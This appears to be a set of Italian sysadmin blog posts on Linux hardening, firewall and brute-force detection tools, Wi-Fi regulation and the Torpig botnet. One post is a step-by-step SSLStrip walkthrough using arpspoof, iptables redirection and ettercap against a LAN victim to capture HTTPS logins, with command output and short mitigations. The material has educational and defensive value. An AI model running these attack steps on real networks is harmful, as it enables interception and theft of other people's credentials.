Tempo fa in questo articolo sull’hardening di base dei sistemi linux si è parlato delle tecniche basilari per mettere in sicurezza un sistema linux esposto sulla rete. In questo articolo vedremo come aumentare di un altro gradino la sicurezza utilizzando alcuni tra gli script più famosi, ovvero: apf (Advanced Policy-based Firewall), bfd (Brute Force Detection) e DDoS Deflate. In questo articolo vedremo come installare i citati scripts e la prima configurazione, inoltre, vedremo dove si trovano i file di configurazione per eventuali regolazioni “di fino”. Questo articolo è rivolto a persone che hanno una buona padronanza dei sistemi linux, inoltre, l’uso del solo “copia e incolla” incosciente può causare un blocco del vostro sistema, come sempre consiglio di ragionare prima di compiere azioni avventate.

Installazione e configurazione di APF: Advanced Policy-based Firewall

Questo script consente di pilotare iptables, su questa pagina si trovano informazioni più dettagliate su apf. Per installare APF bisogna guadagnare i permessi di root e scaricare il seguente file:

# wget http://rfxnetworks.com/downloads/apf-current.tar.gz

scompattiamo e installiamo

# tar xfz apf-current.tar.gz
# cd apf-*
# ./install.sh

a questo punto il firewall è installato e bisogna configurarlo, apriamo il file:

/etc/apf/conf.apf

le prime opzioni da configurare sono le seguenti e rispettivamente servono per: attivare il firewall (di default, attraverso un cron job, ogni 5 minuti vengono aggiornate le regole); configurazione degli ingressi TCP e UDP attivi; AntiDos.

DEVEL_MODE="1"
IG_TCP_CPORTS="21,22,25,53,80,110,143,443,3306"
IG_UDP_CPORTS="53,111"
USE_AD="1"

successivamente possiamo far partire APF con il comando:

# apf --start

Se non siamo contenti della configurazione possiamo muoverci tra la configurazione di APF, ogni singola impostazione è strettamente descritta nel file stesso. Se vogliamo modificare la configurazione AntiDos, per renderla più restrittiva dobbiamo editare il seguente file:

/etc/apf/ad/conf.antidos

Installazione e configurazione di BFD: Brute Force Detection

Questo è uno script che analizza i file di log alla ricerca di errori di autenticazione, per maggiori informazioni sul funzionamento si può consultare questa pagina. Per installare BFD, come al solito guadagnamo i privilegi di root e rispettivamente con i seguenti comandi scarichiamo, scompattiamo e installiamo lo script:

# wget http://rfxnetworks.com/downloads/bfd-current.tar.gz
# tar xfz bfd-current.tar.gz
# cd bfd-*
# ./install.sh

il file di configurazione si trova nella seguente posizione:

/usr/local/bfd/conf.bfd

attiviamo lo script e impostiamo una mail modificando le seguenti impostazioni

ALERT="1"
EMAIL_USR="username@yourdomain.com"

come per il precedente script possiamo modificare una miriade di impostazioni che si trovano nel file di configurazione, non è complicato in quanto ogni impostazione è minuziosamente descritta. Buona cosa è editare il file

/usr/local/bfd/ignore.hosts

inserendo il vostro IP, per evitare, in caso di errori, che lo script neghi a voi stessi l’accesso. Non ci resta che far partire lo script:

/usr/local/sbin/bfd -s

Installazione e configurazione di DDoS Deflate

Questo script inizialmente è stato sviluppare per funzionare sui server MediaLayer per arginare gli attacchi (D)Dos, molti sysadmin vista l’efficacia decidono di installarlo sui propri server. Come al solito guadagnamo i privilegi di amministratore e con i seguenti comandi scarichiamo e installiamo DDoS Deflate:

# wget http://www.inetbase.com/scripts/ddos/install.sh
# sh install.sh

e già pronto per funzionare ma se vogliamo modificare qualche impostazione possiamo modificare il file:

/usr/local/ddos/ddos.conf

non ci resta che avviare lo script:

# /usr/local/ddos/ddos.sh -c

Conclusioni

In questo articolo abbiamo visto come aumentare di una tacca la sicurezza del nostro sistema linux, ricordate sempre che la sicurezza in modo assoluto non esiste e buona fortuna.

Saluti

PS Per gli script appena installati ricordate che al riavvio non partiranno, bisogna impostarli per farli partire al reboot.

Premesso che la sicurezza in modo assoluto non esiste, oggi affronteremo un argomento molto vasto e complesso l’hardening di un sistema linux, cioè come rendere più sicuro un sistema esposto sulla rete. In realtà non esiste una guida o “la guida” per mettere in sicurezza un sistema linux ma esistono delle regole per evitare che un sistema sia meno attaccabile. Inoltre, questa non vuole essere una guida esaustiva ma una specie di promemoria sulle operazioni da compiere appena installato un sistema linux.
Questo promemoria sull’hardening di un sistema linux è destinato a persone che hanno un po’ di esperienza su linux, particolari conoscenze o riti arcani non servono, basta conoscere un po’ il sistema che si intende modificare e i concetti base di linux, comunque, se ricopiate paro paro i comandi senza ragionare rischiate di rendere inaccessibile il vostro sistema.

Le partizioni e il filesystem

Come tutti sanno la radice del filesystem può essere su un unica partizione oppure articolata con diversi punti di montaggio. Come da molte guide che si possono trovare in giro per la rete è ormai assodato che le directory /tmp , /var , /usr e /home vanno montate in partizioni separate.

• Il punto di montaggio /tmp è pubblico, cioè tutti gli utenti devono avere la possibilità di scrivere, quindi, un aumento spropositato di questo punto di montaggio potrebbe mettere in crisi tutto il sistema se esso fosse su un’unica partizione. Non conviene montare questa partizione con l’opzione noexec poiché spesso alcuni software usano questa posizione per installare/aggiornare i pacchetti. Poi, se si è abbastanza paranoici come il sottoscritto, si può montare la partizione con l’opzione noexec, quando bisognerà fare manutenzione sul sistema /tmp verrà smontata e rimontata senza l’opzione noexec.
• Il punto di montaggio /var è altrettanto importante per quanto riguarda la sicurezza del sistema, specialmente per la presenza di /var/log, in esso vengonono salvati i log di sistema e in caso di un attacco DOS o un brute force potrebbe aumentare a dismisura. Questa partizione si può montare tranquillamente con l’opzione noexec.
• Il punto di montaggio /usr va montato in sola lettura, da smontare e rimontare in scrittura quando bisogna fare manutenzione al sistema.
• Per il punto di montaggio /home è buona cosa usare una partizione separata, per una serie infinita di motivi, tra i quali vi è la necessità di montare la partizione con l’opzione noexec. Questo si fa per evitare che un utente possa caricare un eseguibile bacato con l’intento di sfruttare lo stesso eseguibile per ottenere i privilegi di amministratore tramite shellcode.

Già queste impostazioni garantiscono una buona sicurezza, poi se si è abbastanza paranoici si può pensare di togliere il bit SUID/SGID da molti eseguibili non strettamente necessari, dipende da sistema a sistema. In caso si utilizza un sistema virtuale in remoto si potrebbe anche utilizzare le quote per settare le dimensioni massime che devono avere le cartelle.
Se siete sysadmin molto paranoici come il sottoscritto, subito dopo l’installazione del sistema ci si può calcolare hash di alcuni file sensibili: grep, ls, ps, netstat ecc; infatti, essi sono i primi che un probabile un attaccante modifica per nascondersi nel sistema. Per questa operazione è meglio usare MD5 e SHA1 al posto di MD2 e MD4 che sono algoritmi già violati (teoricamente anche l’MD5 è violabile ma solo in determinate condizioni che non rientrano nel nostro caso). Logicamente ad ogni aggiornamento bisogna ricalcolare gli hash, ci si può costruire facilmente uno script che faccia questo.

Utenti

Per un servizio che è costantemente esposto sulla rete i nomi utente giocano un ruolo molto importante se non fondamentale. Da molti bruteforce subiti, sicuramente da parte di bot che scansionano la rete alla ricerca di sistemi vulnerabili, i nome utente più attaccati sono: root, admin, administrator, testing, spam, postgres, ftpuser, user, newsletter, fax, ftp, office, training, demo, oracle, master, contact, staff, sales, backup, info, test, marketing, smtp, bob, windows, webmaster, mysql, anonymous, guest, ecc., quindi di conseguenza utilizzare questi nome utente per i servizi non è un’idea molto buona, usare questi username si semplifica del 50% il compito di un eventuale attaccante.
Una buona soluzione è quella di utilizzare per i nome utente regole simili quelle delle passwords o quasi. Per esempio, all’utente Mario Rossi si potrebbe impostare un nome utente tipo “MarioRossi123z” oppure “mrossi56ScF” e così via. La stesso concetto si può estendere anche agli accessi ftp o mail se si fornisce un servizio di hosting o simili.
Vietare l’accesso ssh agli utenti e non permettere l’utilizzo di shell, altrimenti un utente malintenzionato potrebbe compilare o caricare un eseguibile con un bug costruito ad hoc e attraverso esso ottenere i privilegi di root. Impostando la partizione /home con noexec, vietando agli utenti l’utilizzo di shell e dei compilatori possiamo stare relativamente tranquilli.

Volendo essere paranoici ci si può costruire uno script che analizza ogni ora o mezzora i log di sistema e ad un tot numero di login falliti da parte di un ip metta in banlist lo stesso. Ci si può inventare un pò di tutto, basta un pò di fantasia.

Servizi

I servizi senza ombra di dubbio sono la via d’accesso dei nostri potenziali intrusi, dire che bisogna mantenere aggiornato il software è abbastanza scontato, quindi, la prima regola è un update di sicurezza giornaliero.
La scelta migliore che si possa fare è chiudere tutti i servizi che non ci servono e rinforzare quelli che offriamo. Come prima cosa eliminare totalmente telnet e simili, se per caso sono installati, ma ormai neanche nelle installazioni di default ci stanno sti servizi. Successivamente controlliamo quali servizi sono aperti digitando da terminale:

netstat -t -u -l

oppure se preferiamo il numero delle porte

netstat -t -u -l --numeric-ports

dovremmo ottenere un output simile a questo

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address      Foreign Addr  State
tcp        0      0 *:pop3s                *:*       LISTEN
tcp        0      0 *:mysql                *:*       LISTEN
tcp        0      0 *:pop3                 *:*       LISTEN
tcp        0      0 *:imap                 *:*       LISTEN
tcp        0      0 localhost.locald:domain*:*       LISTEN
tcp        0      0 *:smtp                 *:*       LISTEN
tcp        0      0 *:imaps                *:*       LISTEN
tcp        0      0 *:http                 *:*       LISTEN
tcp        0      0 *:domain               *:*       LISTEN
tcp        0      0 *:ftp                  *:*       LISTEN
tcp        0      0 *:https                *:*       LISTEN
tcp        0      0 *:ssh                  *:*       LISTEN
udp        0      0 localhost.locald:domain*:*
udp        0      0 localhost.locald:domain*:*
udp        0      0 *:36593                *:*
udp        0      0 *:domain               *:*

Vediamo dove intervenire

Mettere in sicurezza SSH

Come detto in precedenza solo gli admin o l’admin dovrebbe essere abilitato a questo accesso, gli altri utenti non devono poter accedere a questo servizio. Inoltre, molto importante è disabilitare l’accesso all’utente root, i privilegi di superutente verranno acquisiti dagli admin tramite il comando su.
Apriamo il file /etc/ssh/sshd_config con un editor, per disabilitare l’accesso a root, lasciare l’accesso solo ad alcuni utenti e vietare l’uso di password vuote, modificare come segue le seguenti linee

PermitRootLogin no
AllowUsers pincopallino, secondopinco
PermitEmptyPasswords no

Una buona idea è cambiare la porta predefinita del servizio e forzare l’utilizzo del protocolo 2

Port 65000
Protocol 2

eventualmente per impedire l’utilizzo di sftp commentare la riga

#Subsystem    sftp    /usr/libexec/openssh/sftp-server

eventualmente se si volesse modificare il banner di presentazione del servizio, prima bisogna de-commentare la seguente riga e successivamente impostare una path dove salvare un file di testo con il banner

#Banner /some/path

modificato tutto, bisogna riavviare il servizio sshd stando attenti a non fare alcun errore, se si opera in remoto si rischia di autoescludersi dal sistema.

In caso la paranoia si fa sentire, si può abilitare l’accesso a ssh soltanto in possesso di una chiave crittografica impostando nel file di configurazione

PubkeyAuthentication yes

successivamente bisognerà generare una chiave privata e una pubblica per ogni utente a cui si vuole dare l’accesso, maggiori informazioni su http://sial.org/howto/openssh/publickey-auth o http://www.openssh.com, l’accesso si effettua soltanto con la chiave e non verrà richiesta alcuna password.
Inoltre, possiamo fare in modo che ogni utente loggato lavori in un abiente simile ad un sistema linux ma limitato di alcuni comandi utilizzando un fake chroot, oppure, possiamo prevedere l’apertura della porta ssh con il port knocking (la classica bussata segreta) per queste e altre tecniche rimando sempre al sito ufficiale di openssh, altrimenti questo articolo diventerebbe troppo lungo.

Gli altri servizi

Secondo il mio punto di vista sono da prediligere pop3s, smtps e imaps e da chiudere pop3, smtp e imap a meno che non abbiate degli utenti che li utilizzano, in tal caso bisognerà costruire una specie di piano d’uscita da questi servizi obsoleti.

Limitare un SYN Flood

Questo era un attacco DOS molto comune alla fine del secolo scorso, le recenti impostazioni di rete tendono a limitare o annullare del tutto questo tipo di attacco. L’attacco tende a saturare le risorse di sistema, una descrizione dell’attacco la si può trovare su http://www.cert.org/advisories/CA-1996-21.html . Per limare ulteriolmente le impostazioni di sicurezza rispetto a quelle della vostra rete si possono utlizzare i SYN cookies, essi limitano il numero di richieste da parte di un singolo utente. Aprire il file /etc/sysctl.conf (è un file di configurazione del kernel) ed editare le seguenti linee

#Prevent SYN attack
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = xxx
net.ipv4.tcp_synack_retries = 2

e le successive linee per la protezione contro l’IP Spoofing

# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

poi se si desidera configurare la distribuzione come un firewall possiamo utilizzare la configurazione proposta da http://openskill.info/infobox.php?ID=1166

net.ipv4.ip_forward = 1
net.ipv4.ip_dynaddr = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_sack = 0
net.ipv4.tcp_timestamps = 0
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_fin_timeout = 30
net.ipv4.tcp_window_scaling = 0
net.ipv4.tcp_syn_retries = 3
net.ipv4.tcp_synack_retries = 3
net.ipv4.conf.default.rp_filter = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.default.log_martians = 1
net.ipv4.conf.all.rp_filter = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.log_martians = 1
kernel.printk = 1 4 1 7
##
net.ipv4.tcp_max_syn_backlog=1280
net.ipv4.conf.all.send_redirects=0
net.ipv4.conf.all.forwarding=0
net.ipv4.conf.all.mc_forwarding=0
net.ipv4.vs.timeout_timewait=60

Conclusioni

Secondo il mio punto di vista questo è il minimo sindacale per mettere in sicurezza il nostro sistema esposto ai rischi della rete. Certo l’hardening non finisce qua, anzi, questa è solo la punta dell’iceberg, è compito di ogni sistemista documentarsi e apprendere giorno per giorno nuove tecniche, anche tentando di violare i propri sistemi per saggiarne la sicurezza.

In rete si trovano numerosi script che ci aiutano in questo compito, magari in un prossimo futuro farò un articolo in merito.

Saluti

Oggi si parla di sicurezza informatica, o di insicurezza informatica dipende dai punti di vista. SSL Strip è una tecnica presentata al Black Hat DC del 2009 che rientra nella categoria dei MITM (Main in the middle). All’interno di una rete LAN, questa tecnica permette di sniffare le password provenienti da un server sicuro, HTTPS per fare un esempio. Questa tecnica risulta molto pericolosa, in quanto, se un malintenzionato riuscisse ad entrare in una qualsiasi rete LAN o rete wireless (abitazione, ufficio, ecc) potrebbe venire in possesso dei vostri account email e password di hotmail, gmail, facebook, twitter, instantempo e perfino i dati bancari. La tecnica, a grandi linee, molto semplicemente, consiste nel far in modo che il computer dell’attaccante si metta in mezzo tra il computer della vittima e il router, il computer dell’attaccante diventa un “nodo invisibile” su cui vengono veicolate tutte le informazioni. A fine articolo si abbozzeranno delle soluzioni al problema.

Configurazione di SSL Strip

Il sistema che userò per configurare gli script e i programmi è Ubuntu 10.4, per diversi motivi: i sorgenti e i comandi sono progettati per un sistema Linux; su un altro sistema non si possono fare tutte le modifiche che ci si propone di fare; sono molti anni che uso Ubuntu e lo conosco fin nei minimi particolari.

La prima operazione da fare è scaricare SSLStrip da: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz

Scompattare il pacchetto, utilizzare “tar -zxvf sslstrip-0.4.tar.gz” se si sta operando da terminale.

arturu@arturu-laptop:~/Scrivania$ tar -zxvf sslstrip-0.7.tar.gz
sslstrip-0.7/
sslstrip-0.7/setup.py
sslstrip-0.7/README
sslstrip-0.7/COPYING
sslstrip-0.7/lock.ico
sslstrip-0.7/sslstrip/
sslstrip-0.7/sslstrip/StrippingProxy.py
sslstrip-0.7/sslstrip/URLMonitor.py
sslstrip-0.7/sslstrip/ServerConnectionFactory.py
sslstrip-0.7/sslstrip/__init__.py
sslstrip-0.7/sslstrip/ServerConnection.py
sslstrip-0.7/sslstrip/ClientRequest.py
sslstrip-0.7/sslstrip/SSLServerConnection.py
sslstrip-0.7/sslstrip/CookieCleaner.py
sslstrip-0.7/sslstrip.py
arturu@arturu-laptop:~/Scrivania$

Il file compresso viene estratto in una cartella, entrare nella cartella e compilare il codice sorgente con “python setup.py build” (è necessario avere installato l’interprete python)

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ python setup.py build
running build
running build_py
creating build
creating build/lib.linux-i686-2.6
creating build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/CookieCleaner.py -> build/lib.linux-i686-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
Cleaning up...
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Successivamente bisogna installare tutto con il comando “sudo python setup.py install”

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sudo python setup.py install
[sudo] password for arturu:
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.6.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.6.egg-info
Cleaning up...
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Appena installato SSLStrip, bisogna procedere all’installazione di arpspoof. Arpspoof è un programma che fa credere ad un host (computer della vittima) che l’indirizzo MAC dell’attaccante è l’indirizzo MAC del router (contaminando i pacchetti arp, ma questo è un altro discorso), così facendo la vittima inizia ad inviare all’attaccante tutto il suo traffico di rete; il kernel dell’attaccante, ad eccezione per il traffico destinato alla porta 80, reindirizza tutto a $ listenPort (10000, per esempio).

Installiamo arpspoof con il comando “sudo apt-get install dsniff” e successivamente installiamo Ettercap (altro famoso tool per la cattura dei pacchetti) con il comando “sudo apt-get install ettercap”.

Adesso che abbiamo installato tutto il software si può passare all’utilizzo.

Utilizzo di SSLStrip

Da ora in poi facciamo finta che noi siamo gli attaccanti e Mario sia la nostra vittima. Come prima cosa bisogna conoscere il nostro indirizzo ip all’interno della rete LAN, da terminale digitiamo “ifconfig”

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ ifconfig
eth0    Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisioni:0 txqueuelen:1000
          Byte RX:0 (0.0 B)  Byte TX:0 (0.0 B)
          Interrupt:21
wlan0  Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          indirizzo inet:10.10.100.5  Bcast:10.10.100.255  Maschera:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:41373 errors:0 dropped:0 overruns:0 frame:0
          TX packets:44774 errors:0 dropped:0 overruns:0 carrier:0
          collisioni:0 txqueuelen:1000
          Byte RX:27814338 (27.8 MB)  Byte TX:10429284 (10.4 MB)
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Dopo la voce HWaddr abbiamo il nostro indirizzo MAC e dopo inet il nostro indirizzo ip nella rete interna. In questo caso nella mia rete interna ho il seguente indirizzo ip 10.10.100.5 sull’interfaccia wireless, l’ethernet è disattivata; il mio MAC address è 00:00:00:00:00:00 (l’ho modificato perché non mi va di pubblicarlo).

Bisogna trovare l’indirizzo del gateway, è necessario che esso sia uguale a quello della vittima, situazione che si verifica nel 90% dei casi, digitiamo da terminale ” ip route show | grep default | awk ‘{ print $3}’ “

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ ip route show | grep default | awk '{ print $3}'
10.10.100.254
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

in questo caso l’indirizzo del gateway è 10.10.100.254.
Successivamente bisogna aprire tre diverse schede nella finestra del terminale, perché abbiamo bisogno di eseguire tre comandi in parallelo.
Nel primo tab eseguire “sudo arpspoof -t 10.10.100.2 10.10.100.254″, dove il primo indirizzo ip è quello della vittima e il secondo è il gateway (per trovare gli indirizzi dei computer connessi nella LAN basta utilizzare un qualsiasi scanner di rete), il risultato è simile al seguente (ho modificato i MAC address) praticamente ogni pacchetto della vittima in ogni instantempo viene fatto passare attraverso il nostro computer e inviato al router vero, e viceversa.

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sudo arpspoof -t 10.10.100.2 10.10.100.254
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00

Nella seconda scheda eseguiamo il comando “iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 1000″, serve a renderizzare le richieste dalla porta 80 alla porta 1000 del nostro computer (la porta di destinazione la possiamo cambiare a piacere, in caso fosse già utilizzata da un altro servizio).

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Subito dopo facciamo partire “sslstrip” e si lascia in esecuzione

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sslstrip
sslstrip 0.6 by Moxie Marlinspike running...

Nella terza tab facciamo partire ettercap in sniff mode con il seguente comando “sudo ettercap -Tqz”, aspettiamo che la nostra vittima digiti login e password su una connessione “sicura”, il risultato dovrebbe essere il seguente (ho modificato il mio MAC address)

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sudo ettercap -Tqz
[sudo] password for arturu:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan... (Wireless)
  wlan0 ->	00:00:00:00:00:00      10.10.100.5     255.255.255.0
Privileges dropped to UID 65534 GID 65534...
  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help

Fatto questo appena un utente tenterà di accedere ad un servizio su un server protetto, ettercap intercetterà username e password e la visualizzerà in questa ultima tab.

Utilizzo di SSLStrip secondo la documentazione

Secondo gli autori di SSLStrip l’utilizzo del tool dovrebbe essere il seguente:

• Flip your machine into forwarding mode. (echo “1″ > /proc/sys/net/ipv4/ip_forward)
• Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>)
• Run sslstrip. (sslstrip.py -l <listenPort>)
• Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

In questo modo non sono mai riuscito a beccare una password, forse qualcun altro sarà più fortunato.

Un articolo interessante si può leggere su: http://pointnext.blogspot.com/2010/01/ssl-strip-con-ettercap.html ma ancora non ho avuto il tempo di provare.

Funziona sempre?

Dalle prove che ho fatto se la vittima lavora su una macchina Windows (ho provato soltanto con XP e Vista) l’attacco va a buon fine con qualsiasi browser. Safari su MacOsX restituisce pagina bianca, cioè non fa nessuna operazione e l’attacco non va a buon fine, ma l’utente non riceve nessuna segnalazione sul fatto che la connessione sicura è stata compromessa. Su Ubuntu utilizzando firefox o chrome si viene avvertiti che il certificato di sicurezza non è valido e l’utente può decidere di abbandonare la connessione (comunque se l’utente accetta il certificato viene restituita una pagina bianca), invece con Opera l’attacco va a buon fine.

Soluzioni

Per ora le soluzioni che mi sento di suggerire sono:

• Se è possibile, preferire il cavo alla wireless, infatti è più difficile connettersi ad una LAN con il cavo che non tramite wireless anche se è protetta;
• Aggiornare browser e Sistema Operativo sperando che venga risolto il problema (caso molto probabile in quanto questo problema è noto dal 2009);
• Consiglio di parte: utilizzare un sistema operativo più sicuro degli altri ad es: Ubuntu o MacOsX

Saluti Arturu.it

PS Come tutti hanno capito non si trattava di un articolo che parla dello “Strip” Tease. Tu lettore, se ancora cerchi questo, leggendo ancora non troverai niente, anche perché: l’articolo è finito…

Ultimamente nel panorama politico italiano si ritorna a discutere di connettività senza fili, tema a me molto caro che i miei lettori conoscono bene perché molto spesso me ne esco con questa tematica. In passato ho parlato di come il Wi-Max italiano sarebbe miseramente fallito a causa di scelte governative poco intelligenti, tecnologia che in altri paesi come il Giappone permette di collegarsi a fino a 200 Mbit/s con un raggio massimo di 50 Km dalla stazione (Articolo 1, Articolo 2).

Da qualche giorno il dibattito politico si è spostato sull’abrogazione dell’articolo 7 del decreto Pisanu (155/2005). L’articolo obbligava i gestori di tutti gli esercizi pubblici (internet point, bar, biblioteche, università…) che offrivano la connessione Internet alla richiesta di una speciale licenza al questore, nonché all’identificazione degli utenti tramite documento di identità. Il Decreto, tra le varie disposizioni si proponeva di impedire a dei terroristi di collegarsi alla Rete senza essere identificati, in realtà si è trasformato in un muro alla diffusione della nascente (si fa per dire) tecnologia Wi-Max in Italia. L’aspetto più grave è che questa disposizione si è dimostrata totalmente inutile, in quanto le attenzioni di molti “criminali” si sono rivolte verso gli access-point wireless dei privati (il più delle volte installati da utenti poco esperti), i “punti wireless” dei privati sono facilmente violabili consentendo l’accesso in totale anonimato a chiunque, anzi, sotto l’identità del povero malcapitato (Articolo 1, Articolo 2). Si è costruito così un falso senso di sicurezza. Siamo sicuri che nessuna rete wi-fi è stata mai violata da un “Terrorista”?! non lo sapremo mai perché tutti si sentivano sicuri e non si è indagato su questo. Forse era più saggio monitorare gli accessi anonimi con delle parole chiave tipo “bomba,innesco,c4,ecc”, si è preferito alzare il tappeto e buttare la polvere sotto…

Da wired.it:

L’intenzione di Linda Lanzillotta, Paolo Gentiloni e Luca Barbareschi era quella di riaccendere i riflettori politici e istituzionali sul problema del wi-fi, il primo passo è fatto. La proposta dei tre, che mette d’accordo opposizioni e Futuro e Libertà, ha infatti trovato sostegno praticamente incondizionato alla Camera e l’ipotesi che la connessione senza fili possa proliferare indisturbata prima di Natale si fa sempre più concreta. A favore dell’abolizione dell’articolo 7 del Decreto Pisanu del 2005 si è schierata anche l’Udc, attraverso la sottoscrizione della proposta da parte di Roberto Raho. Pareri favorevoli sono arrivati anche da parte della Lega Nord e del Pdl, con una netta presa di posizione del Club della libertà. La sensibilità dell’Idv è inoltre manifesta da tempo. Quindi, se la matematica non è un’opinione e non essendo necessario mettersi a contare con calcolatrici o pallottolieri di sorta, la maggioranza c’è ed è schiacciante e l’intenzione di mettere mano al regola che prevede che chiunque si colleghi a Internet da una connessione pubblica debba essere identificato con un documento d’identità non è in discussione.

Anche se ci sono tutte le intenzioni di liberalizzare gli accessi alle wi-fi in Italia non succederà mai. Questo lo dico in tempi non sospetti con un 99% di certezza. Se ci fossero reti wireless veramente libere tutti i gestori mobili non avrebbero più ragion d’esistere, basta avere uno smartphone con il supporto wi-fi, un laptop, un iphone, ipad, iqualcosaltro e si è tutti interconnessi, la telefonata come l’sms diventerebbero preistoria!!!

In Italia, mentre noi ci preoccupiamo di liberalizzare l’accesso alle wi-fi gli altri paesi sperimentano il Wi-Max da 330 MEGABIT e le connessioni LTE … io viaggio ancora con l’ISDN a 64kilobit, e non sono il solo…

Recentemente mi sto interessando di botnet, qualche giorno fa ho visto un interessante video-lezione-conferenza sul furto di botnet. Una botnet è una rete di computer collegati ad internet che fanno parte di un insieme di computer controllato da un’unica entità, il botmaster. Ciò può essere causato da falle nella sicurezza o mancanza di attenzione da parte dell’utente e dell’amministratore di sistema, per cui i computer vengono infettati da virus informatici o trojan i quali consentono ai loro creatori di controllare il sistema da remoto. I controllori della botnet possono in questo modo sfruttare i sistemi compromessi per scagliare attacchi distribuiti del tipo denial-of-service (DDoS) contro qualsiasi altro sistema in rete oppure compiere altre operazioni illecite, in taluni casi agendo persino su commissione di organizzazioni criminali. I computer che compongono la botnet sono chiamati bot (da roBOT) o zombie. Un gruppo di ricercatori presso UCSB di recente è riuscito a prendere il controllo su una parte di Torpig botnet per 10 giorni. Durante questo periodo, hanno osservato 180 mila infezioni e registrate quasi 70GB di dati raccolti che i bot. Questi dati includono le informazioni presentate da tutti i siti che la persona infetta aveva visitato, smtp, ftp, pop3, Windows, password, numeri di carta di credito e le password da parte dei manager password.

Qui ci sono i fatti più interessanti della conferenza:

Torpig utilizza una tecnica chiamata “flussante dominio” per evitare di essere arrestato, semplicemente bloccando l’IP o il nome del dominio del server del centro di controllo. L’idea è semplice – in funzione della data e ora l’algoritmo genera un nome di dominio a cui connettersi. Se il dominio viene chiuso, il bot userà semplicemente un dominio diverso, dopo qualche tempo. I ricercatori conoscendo la generazione dei nomi di domino sono stati in grado di assumere il controllo su una parte della botnet crackando l’algoritmo di generazione nome di dominio e la registrazione di alcuni dei nome di dominio da utilizzare per la comunicazione.

